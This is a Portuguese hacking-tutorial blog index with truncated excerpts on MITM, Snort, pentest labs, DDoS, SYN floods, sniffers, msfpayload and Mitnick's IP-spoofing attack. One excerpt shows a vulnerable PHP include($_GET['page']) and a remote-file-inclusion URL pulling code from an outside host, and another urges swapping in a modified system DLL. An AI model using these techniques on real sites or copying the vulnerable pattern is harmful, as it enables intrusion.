publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
Mostrando postagens com marcador Tutoriais. Mostrar todas as postagens

Man-in-the-Middle (MITM para os mais íntimos)


Para pessoas que não tem dinheiro para pagar um cursinho de Inglês (HOMEM-NO-MEIO). Não é um filme de suspense!


O que seria o Man-in-the-Midle?

Também me fiz essa pergunta. No momento em que pesquisava uma das inúmeras ferramentas do Back Track, me deparei com essa expressão, depois de muito pesquisar, acreditem ainda não sei muito sobre ela. Vou tentar ser o mais elucidativo possível afinal os termos que vocês poderão encontrar podem confundir muito.

Um ataque man-in-the-middle (MITM) é um ataque no qual o atacante é capaz de ler, inserir e modificar, mensagens entre duas entidades sem que estas tenham conhecimento que a ligação entre ambas está comprometida. Um verdadeiro pen-test.

   Ou seja, a capacidade de ver, tocar, cheirar, acrescentar e mecher na comunicação entre duas entidades, mais conhecidas como Cliente-Servidor, onde o Cliente pensa que está se comunicando com o
Deixe seu Comentário:
Sem comentários »

Manuais e Tutoriais (Seguranca - Anonymous)

»» Manual para Windows (Browsers / Como falar com os Anonymous no IRC)
:http://www.scribd.com/doc/82049265/Manual-Basico-para-Windows

»» Manual Xchat-para Linux:
http://www.scribd.com/doc/80165397/Manual-Xchat-Linux 

»»  Manual VPN / Criptografia / Programas de defesa para linux:
http://www.scribd.com/doc/80165395/

»» Manual-VPN-Crypto-TOR Manual Ubuntu / Instalação de VirtualBox:
http://www.scribd.com/doc/80165391/

»» Manual-Ubunto-Virtual-Box Manual de sobrevivência em caso de revolução:http://www.scribd.com/doc/78695951/ANONYMOUS-MANUAL-SOBREVIVENCIA

»» Instalação TOR no Back|Track 5 RC3 com DNS pelo TOR:
http://pastebin.com/wPb3X8L0

»» Internet Security and Privacy:
http://pastebin.com/B299Ef39

»» Manual básico de segurança e anonimato na Internet:
http://pastebin.com/ft4LrYsj

»» How to enter Proxy settings in Firefox:
http://www.wikihow.com/Enter-Proxy-Settings-in-Firefox

**AnonProxies: http://www.anon-proxies.com/


»» ANON STREET MÉDICO PRIMER - versão 4:
https://docs.google.com/document/d/1PM1aEiab3BbyZHBo2ymbHJeY5QKOYyLDHXWP958egck/edit?usp=sharing



Fonte: http://anonymouspt.blogspot.com/p/blog-page.html
Deixe seu Comentário:
Sem comentários »

Deteccao de Intrusos com SNORT ( Backtrack 5 R3


Sistema de detecção de intrusão ou IDS, nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real. Um IDS analisa os pacotes que trafegam na rede comparando com assinaturas de ataques.
Os IDS são classificados em dois tipos:
O SNORT

O SNORT é uma ferramenta NIDS desenvolvido por Martin Roesch “open-source” bastante popular por sua flexibilidade nas configurações de regras e constante atualização frente às novas ferramentas de invasão . Outro ponto forte desta ferramenta é o fato de ter o maior cadastro de assinaturas, ser leve, pequeno, fazer escaneamento do micro e verificar anomalias dentro de toda a rede ao qual seu computador pertence.
O código fonte é otimizado, desenvolvido em módulos utilizando linguagem de programação C e, junto, com a documentação, são de domínio público

Deixe seu Comentário:
Sem comentários »
Categorias:
,,

Montando um pentest lab

Nesse tutorial vou tentar mostrar como começar a montar um pequeno laboratório para estudar pentest/hacking em geral

1- Instale um emulador de maquinas virtuais no OS de sua escolha
(eu sugiro Virtual Box no Linux e VMware no Windows)

VMware -
DOWNLOAD - http://www.baixaki.com.br/download/v...orkstation.htm

Virtual Box -
DOWNLOAD - https://www.virtualbox.org/wiki/Downloads

2 – Baixe o METASPLOITABLE
"O Metasploitable é uma máquina virtual rodando Ubuntu Server 8.04, com diversos softwares em versões com vulnerabilidades conhecidas, tais como Tomcat, TikiWiki, entre outros.
O objetivo é estudar a execução de alguns testes e auditorias, assim como a utilização de exploits conhecidos com facilidade em versões antigas de softwares. "

DOWNLOAD E TUTORIAL  Link

3 - Instale o Windows
para poder ter um campo maior para testes é recomendado baixar outros OS como pelo menos 2 versões do Windows (XP e 7) instaladas

4- Instale o BACKTRACK 5
para usar como plataforma de ataque instale o backtrack 5
TUTORIAL - http://pplware.sapo.pt/linux/aprenda...o-backtrack-5/

5- Configurando Maquinas Virtuais em Rede
depois de baixar e instalar os Sistemas no

Deixe seu Comentário:
Sem comentários »
Categorias:
,,

Ter segurança no BackTrack 5 com o TOR na Deep Web ( Outros comandos )

Índice

  • 1 - Introdução
    1.1 - O que é o BackTrack 5?
    1.2 - Por que o BackTrack 5?
    1.3 - E se você quiser usar outro Sistema Operacional?
  • 2 - Faça o download da ISO
    2.1 - Gnome ou KDE?
    2.2 - 32-bit ou 64-bit?
    2.3 - ISO ou VMware?
    2.4 - Direto ou Torrent?
  • 3 - Instalando o BackTrack 5 no HD
    3.1 - Conectando à Internet - Solução 1
    3.2 - Conectando à Internet - Solução 2
    3.3 - Conectando à Internet - Solução 3
  • 4 - Modificações pós-instalação e primeiros passos
    4.1 - Configurando os repositórios
    4.2 - Consertando o controlador de áudio PulseAudio
    4.3 - Consertando o Wicd Network Manager
  • 5 - Personalizando o BackTrack 5
    5.1 - Mudando a senha do root
    5.2 - Mudando o nome do host
  • 6 - Atualizando o BackTrack 5
  • 7 - Instalando os softwares
  • 8 - Instalando as extensões do Firefox
    8.1 - Instalando o TorButton
    8.2 - Instalando o HTTPS Everywhere
    8.3 - Instalando o RefControl
  • 9 - Configurando os softwares e extensões
    9.1 - Configurando o Google Chrome
    9.2 - Configurando o Firefox Web Browser
    9.3 - Configurando o TorButton
    9.4 - Configurando o RefControl
    9.5 - Bloqueando BadNodes no TOR
  • 10 - É isso aí

Espero que os leitores achem esclarecedor, e qualquer dúvida pode ser feita no tópico em que esta página for por mim divulgada.

1 - Introdução

O que é o BackTrack 5?

O BT5 é uma distribuição de Linux voltada para PenTesting, teste de penetração em sistemas através de vulnerabilidades.
Você pode ler muita coisa sobre ele entrando no Google e pesquisando sozinho, por isso não perderei tempo explicando.
O BackTrack 5 é baseado no Ubuntu 10.04, o preferido de longa-data de muitos usuários.
Ubuntu é outra distro de Linux, pesquise isso por conta própria se lhe interessar.

Por que o BackTrack 5?

O BT5 é uma distro de Linux um tanto pesada, visto os seus 2GB de download da ISO ou da Máquina Virtual.
Mesmo assim, o motivo de escolhê-lo se torna óbvio desde o primeiro momento que você der Boot.
É um sistema leve e todo previamente configurado para ser multiuso de muitas formas, e já vem com dezenas de feramentas.
A única desvantagem é que o BackTrack nunca vem com equipamentos de lazer, mas isso será resolvido durante o tutorial.

E se você quiser usar outro Sistema Operacional?

Para usar as configurações do Firefox e das extensões aqui apresentadas em uma máquina rodando outro Sistema Operacional
(Windows, Mac, outra distro de Linux), leia apenas as seções 8, 9 e 10 do tutorial.

Também será necessário que você instale o Vidalia Bundle, não importa qual Sistema Operacional você use.
Para instalá-lo, entre nesse link e siga os procedimentos referentes ao seu OS:
https://www.torproject.org/download/download.html
Se usar o Windows, baixe o arquivo
vidalia-bundle-[VERSÃO DO ARQUIVO].exe
que ficará localizado com o seguinte texto:
"Stable Vidalia Bundle works with Windows 7, Vista, XP, Download Stable (sig)"

Após instalá-lo, reinicie o computador.
Caso apareça este erro:

Você deve desbloquear no seu Firewall os programas

Deixe seu Comentário:
6 comentários
Categorias:
,

Como Mitnick invadiu Tsutomu Shimomura com um ataque de sequência de IP (Inédito)

Parece haver até hoje, muita confusão sobre a trapaça de endereço IP e os ataques de conexão clandestina descritos pelo artigo NYT, em 23/01/95, de John Markoff e na advertência CERT CA-95:01. Estão aqui alguns detalhes técnicos da minha apresentados, em 11/01/95, na CMAD 3 em Sonoma, Califórnia. Esperançosamente isto ajudará a esclarecer todos os desentendimentos a respeito da natureza destes ataques.
Dois mecanismos de ataque diferentes foram usados. A trapaça de fonte do endereço IP e
a predição da sequência TPC de números foram usadas para obter o acesso inicial a uma estação de trabalho obsoleta (diskless quer dizer ¨sem disco¨, mas não entendi, então botei a palavra ¨obsoleta¨ no lugar) que estava sendo usada, em sua maior parte, como um terminal X. Depois que o acesso root foi obtido, uma conexão existente para outro sistema foi afetada por meio de um módulo STREAMS carregável do kernel.
Incluso nesta nota estão partes de logs dos pacotes atuais do tcpdump gerados por esse
ataque. No interesse da clareza (e brevidade!), algumas informações foram omitidas. Eu recomendo bastante os papéis e postais sobre trapaça de IP, de Steve Bellovin, onde ele descreve em mais detalhes a semântica do TCP handshake (alguém precisa traduzir ¨handshake¨ pra mim. Nunca fiz curso de inglês), assim como dá algumas sugestões de como vencer este ataque.

A configuração é a seguinte:

servidor = um SPARCstation rodando um Solaris 1 servindo meu ¨terminal X¨
x-terminal = Um SPARCstation rodando um Solaris 1
alvo = o aparente primeiro alvo do ataque

O ataque de trapaça de IP começou, mais ou menos, às 14:09:32 PST, em 25/12/94. As primeiras tentativas foram de toad.com (essa informação derivada do log dos pacotes):

14:09:32 toad.com# finger -l @target
14:10:21 toad.com# finger -l @server
14:10:50 toad.com# finger -l root@server
14:11:07 toad.com# finger -l @x-terminal

Deixe seu Comentário:
Sem comentários »
Categorias:

Criando extensões para o Google Chrome

Eu estava navegando na Net quando me veio uma curiosidade, como criar extensões para o google chrome, a resposta veio rápido, achei esse site aqui : http://imasters.com.br/artigo/19377/...-google-chrome
Mas agora, eu irei mostrar o que eu aprendi.
1º. Crie uma pasta com o nome de sua extensão.
2º. Vá ao bloco de notas e crie um arquivo chamado manifest.json com a seguite formatação :

Citação:

{
"name": "NOME DA EXTENSAO",
"version": "VERSAO",
"description": "DESCRICAO DA EXTENSAO",
"browser_action":{
"default_icon": "O ICONE DA EXTENSAO",
"popup": "PAGINA HTML DA SUA EXTENSAO"
}
}

Bem, como vocês viram, é preciso aprender HTML, nada tão difícil, já que a Net tá cheia de tutoriais.
3º. Crie um arquivo HTML
Exemplo :

Citação:

<html>
<head>
</head>
<body>
<h1 align="center"><b>Minha primeira Extensao !</b></h1>
</body>

Deixe seu Comentário:
Sem comentários »
Categorias:

Tudo que você precisa saber sobre os ataques DDoS

Através do presente artigo, os autores pretendem desmistificar os recentemente famosos ataques DDoS (Distributed Denial of Service), explicando não somente a anatomia do ataque e a forma como ele é orquestrado, mas principalmente dando a conhecer algumasestratégias de como mitigá-lo. São abordados também alguns mecanismos de detecção do ataque e, caso você se torne uma vítima, são apresentadas algumas diretivas de como reagir.
O artigo descreve também, de maneira sucinta, o funcionamento das ferramentas DDoS comumente usadas nos ataques.
Introdução
No último mês, o assunto segurança de redes passou a fazer parte da ordem do dia na imprensa falada e escrita. Na pauta das conversas nos cafés e esquinas das
cidades tornou-se comum falar sobre os hackers, os mais recentes ataques que deixaram inacessíveis alguns dos mais famosos web sites, e até mesmo se ouvia falar em ataques de "negação de serviço" (Denial of Service, DoS).
Mas, afinal, o que é um ataque de "negação de serviço"? Os ataques DoS são bastante conhecidos no âmbito da comunidade de segurança de redes. Estes ataques, através do envio indiscriminado de requisições a um computador alvo, visam causar a indisponibilidade dos serviços oferecidos por ele. Fazendo uma analogia simples, é o que ocorre com as companhias de telefone nas noites de natal e ano novo, quando milhares de pessoas decidem, simultaneamente, cumprimentar à meia-noite parentes e
amigos no Brasil e no exterior. Nos cinco minutos posteriores à virada do ano, muito provavelmente, você simplesmente não conseguirá completar a sua ligação, pois as linhas telefônicas estarão saturadas.
Ao longo do último ano, uma categoria de ataques de rede tem-se tornado bastante conhecida: a intrusão distribuída. Neste novo enfoque, os ataques não são baseados no uso de um único computador para iniciar um ataque, no lugar são utilizados centenas ou até milhares de computadores desprotegidos e ligados na Internet para lançar coordenadamente o ataque. A tecnologia distribuída não é completamente nova, no entanto, vem amadurecendo e se sofisticando de tal forma que até mesmo vândalos curiosos e sem muito conhecimento técnico podem causar danos sérios. A este respeito, o CAIS tem sido testemunha do crescente desenvolvimento e uso de ferramentas de ataque distribuídas, em várias categorias: sniffers,
scanners, DoS.
Seguindo na mesma linha de raciocínio, os ataques Distributed Denial of Service, nada mais são do que o resultado de se conjugar os dois conceitos: negação de serviço e intrusão distribuída. Os ataques DDoS podem ser definidos como ataques DoS diferentes partindo de várias origens, disparados simultânea e coordenadamente sobre um ou mais alvos. De uma maneira simples, ataques DoS em larga escala!.
Os primeiros ataques DDoS documentados surgiram em agosto de 1999, no entanto, esta categoria se firmou como a mais nova ameaça na Internet na semana de 7 a 11 de Fevereiro de 2000, quando vândalos cibernéticos deixaram inoperantes por algumas horas sites como o Yahoo, EBay, Amazon e CNN. Uma semana depois, teve-se notícia de ataques DDoS contra sites brasileiros, tais como: UOL, Globo On e IG, causando com isto uma certa apreensão generalizada.
Diante destes fatos, a finalidade deste artigo é desmistificar o ataque, de modo que administradores e gerentes de sistemas, conhecendo melhor o inimigo, se preparem para combatê-lo.
Desmistificando o ataque
OS PERSONAGENS

Quando tratamos de u

Deixe seu Comentário:
Sem comentários »
Categorias:
,

Ativar animação dos ícones escondida no Windows 7

Olá pessoal, hoje irei explicar este efeito muito interessante escondido no Windows 7, para começarmos vamos precisar baixar um dll modificado para destravar esta função. O nome da dll é ExplorerFrame.dll. Para baixá-la clique aqui. Neste pacote está incluso as versões x86 e x64. É importante saber qual é o seu seu sistema. Vamos começar:

1. Para darmos início, vamos precisar acessar a pasta C:\Windows\System32 e procurar pelo arquivo  ExplorerFrame.dll original. Depois clique em cima dele com o botão direito do mouse e vá em

Deixe seu Comentário:
Sem comentários »
Categorias:

Armitage - Interface gráfica para Metasploit

O Armitage me chamou muita atenção, a primeira vez que utilizei o programa, pode perceber que se tratava de um ótimo programa e um pouco parecido com o "Canvas", foi o que me levou a fazer uma requisição para que a ferramenta pudesse se adicionada no BackTrack, uma das distro prediletas.


O topico da requisição:
http://www.backtrack-linux.org/forums/tool-requests/35521-armitage-%96-cyber-attack-management-metasploit.html 
O programa esta disponíveis nos repositórios do backtrack, basta ir no shell e atualizar a distro:
# apt-get update && apt-get upgrade


Depois vai no menu Dragon > BackTrack > Penetration > Armitage


Qualquer um pode contribuir com tools que se encaixam da ideologia da distro, nesse link:
http://www.backtrack-linux.org/forums/tool-requests/ 
Agora vamos fazer um pouco sobre ela:




                            Armitage






Deixe seu Comentário:
Sem comentários »
Categorias:
,

O que é hash?

 
O que é Hash?


Um hash (ou escrutínio) é uma sequência de bits geradas por um algoritmo de dispersão, em geral representada em base hexadecimal, que permite a visualização em letras e números (0 a 9 e A a F), representando 1/2 byte cada. O conceito teórico diz que "hash é a transformação de uma grande quantidade de informações em uma pequena quantidade de informações".


Essa sequência busca identificar um arquivo ou informação unicamente. Por exemplo, uma mensagem de correio eletrônico, uma senha, uma chave criptográfica ou mesmo um arquivo. É um método para transformar dados de tal forma que o resultado seja (quase) exclusivo. Além disso, funções usadas em criptografia garantem que não é possível a partir de um valor de hash retornar à informação original.


Como a sequência do hash é limitada, muitas vezes não passando de 512 bits, existem colisões (sequências iguais para dados diferentes). Quanto maior for a dificuldade de se criar colisões intencionais, melhor é o algoritmo.
Deixe seu Comentário:
Sem comentários »
Categorias:

Pendrives e cartões 'inflados', e como detectá-los

Um fenômeno cada vez mais comum são os pendrives e cartões de memória "inflados", onde o controlador exibe uma capacidade várias vezes maior que a real. Este acabou se tornando um ramo lucrativo, já que qualquer fabriqueta de fundo de quintal em algum subúrbio da China pode transformar milhares de pendrives ou cartões com 1 GB ou menos em modelos de 16 GB ou mais sem grande esforço, tendo o trabalho apenas de falsificar também as inscrições e a embalagem.
Por terem um valor inicial muito baixo, estes produtos remarcados encontram rapidamente o caminho dos sites de leilão, vendedores ambulantes e até mesmo algumas lojas respeitáveis, transformando-se em uma verdadeira praga.
Este tipo de falsificação é bem mais grave que uma simples remarcação (ou seja, vender outro produto similar, porém de uma marca mais barata como se fosse um pendrive da Kingston ou uma bateria da Nokia, por exemplo) pois o produto resultando realmente lesa o comprador, fazendo com que não apenas ele leve um produto com uma capacidade várias vezes inferior, quanto perca dados.
Este processo de "inflar" a capacidade algumas vezes pode beirar o ridículo, como no caso desta imitação de um HD externo da Samsung:

Por fora ele até engana, mas se tiver a curiosidade de abrí-lo vai ter uma surpresa:

Esta foto foi postada por um colega do leste da Rússia, que mora perto da fronteira com a China. Dentro do "HD" temos duas porcas para simular o peso e um pendrive de 128 MB, cujo controlador foi modificado para funcionar em loop,
Deixe seu Comentário:
Sem comentários »
Categorias:
,,

Entendendo o MsfPayload

A utilidade do msfpayload permite o usuário modificar cargas úteis existentes dependendo dos parâmetros fornecidos na linha de comando, e obtem a saída em C, Perl, ou o exemplo de seguimento de Raw. ilustra o uso do msfpayload. O msfpayload –h exibe uma lista de comandos  e opções que podem ser usadas junto com todas as cargas úteis disponíveis, segundo as indicações de figura 1.25. Nós precisamos agora de selecionar uma carga útil. A opção de S mostra-nos a informação sobre uma carga útil específica, segundo as indicações da figura 1.26 mais a frente.
Deixe seu Comentário:
Sem comentários »
Categorias:

Descobrir vulnerabilidade de php injection e explorar

Como que acontece a inclusão de arquivos remotos (RFI)?
A função include() do PHP é usada para incluir alguma coisa.
Se essa função não for usada com segurança, alguém mal-intencionado
poderá explorar esta falha de segurança. Assim podendo desfigurar seu site ou em alguns casos só invadir seu site por invadir. incluindo scripts PHP(php injection) e executar comandos arbitrários no sistema.
Exemplo de página vulnerável:
include($_GET['page']);
Irá incluir a pagina especificada pelo programador, que será identificada via browser(na url), deixando o site vulnerável, pois qualquer um poderá mudar o nome da pagina via GET.
Ex:   http://127.0.0.1/vuln.php?page=http://www.qualquer-coisa.com/imagem.gif
Deixe seu Comentário:
Sem comentários »
Categorias:

Como explorar falha em programas usando Exploit

Este tutorial é bem explicativo, de como explorar uma falha em um programa.
Então vamos começar
Stack overflow – esta é uma das técnicas mais fáceis(pelo menos que eu acho).
Não ensinarei a criar shellcodes e essas  coisas,  sei  que  e  relacionado  ao assunto  mais  segue  um  caminho totalmente  diferente com relação  ao  que  eu  quero  passar  para  vocês. Vejam o meu post que eu estou disponibilizando um livro de buffer overflow. Não percam, estou disponibilizando vários livros que eu mesmo estou traduzindo. Dêem uma olhada no blog, e procure sobre alguns dos meus livros.



Introdução
Um processador e formado por uma ULA(Unidade Lógica Aritmética), uma Unidade de Controle e pelos Registradores.
Registradores  são pequenas  áreas da memória(dentro do processador) que servem para armazenar  alguns
Deixe seu Comentário:
Sem comentários »
Categorias:

Oque é,como funciona Tutorial »EXPLOIT«

Nos dias actuais são indiscutíveis os grandes benefícios obtidos por meio da interligação dos computadores em uma única e grande rede acessível a partir de qualquer ponto do globo.
A Internet, essa grande teia que une milhões de computadores em torno do mundo, é uma conquista irreversível que admite um único futuro: uma contínua e freqüente expansão.
Entretanto, com o advento dessa incrível interconexão de máquinas em escala mundial, muitos ainda são os problemas que precisam ser resolvidos para que os usuários obtenham uma razoável segurança na utilização dos serviços
Deixe seu Comentário:
Sem comentários »
Categorias:

Ataque Syn Flood ( Como funciona )

SYN flood ou ataque SYN é uma forma de ataque de negação de serviço (também conhecido como Denial of Service – DoS) em sistemas computadorizados, na qual o atacante envia uma seqüência de requisições SYN para um sistema-alvo.
Quando um cliente tenta começar uma conexão TCP com um servidor, o cliente e o servidor trocam um série de mensagens, que normalmente são assim:
  • O cliente requisita uma conexão enviando um SYN (synchronize) ao servidor.
Deixe seu Comentário:
Sem comentários »
Categorias:

Entendento Snifferst

Sniffers ou farejadores são softwares muito úteis. Tão grande é a utilidade deles, que até os sistemas de IDS (como o Snort) são feitos com base em sniffers. Um sniffer é um programa que consegue capturar todo o tráfego que passa em um segmento de uma rede. Para tornar mais fácil o entendimento, observe a imagem abaixo:
Imagem



Quando ligamos computador no HUB, e enviamos informação de um computador para o outro, na realidade esses dados vão para todas as portas do HUB, e conseqüentemente para todas as máquinas. Acontece que só a máquina na qual a informação foi destinada enviará para o sistema operacional.


Se um sniffer estivesse rodando nos outros computadores, mesmo sem esses sistemas enviarem a informação que trafega ali para o sistema operacional, o farejador intercederá na camada de rede, capturando os dados e mostrando-os para o usuário, de forma pouco amigável. Geralmente os dados são organizados por tipos de protocolo (TCP, UDP, FTP, ICMP, etc...) e cada pacote mostrado pode ter seu conteúdo lido. Uma típica tela de sniffer seria a mostrada abaixo:

Deixe seu Comentário:
Sem comentários »
Categorias: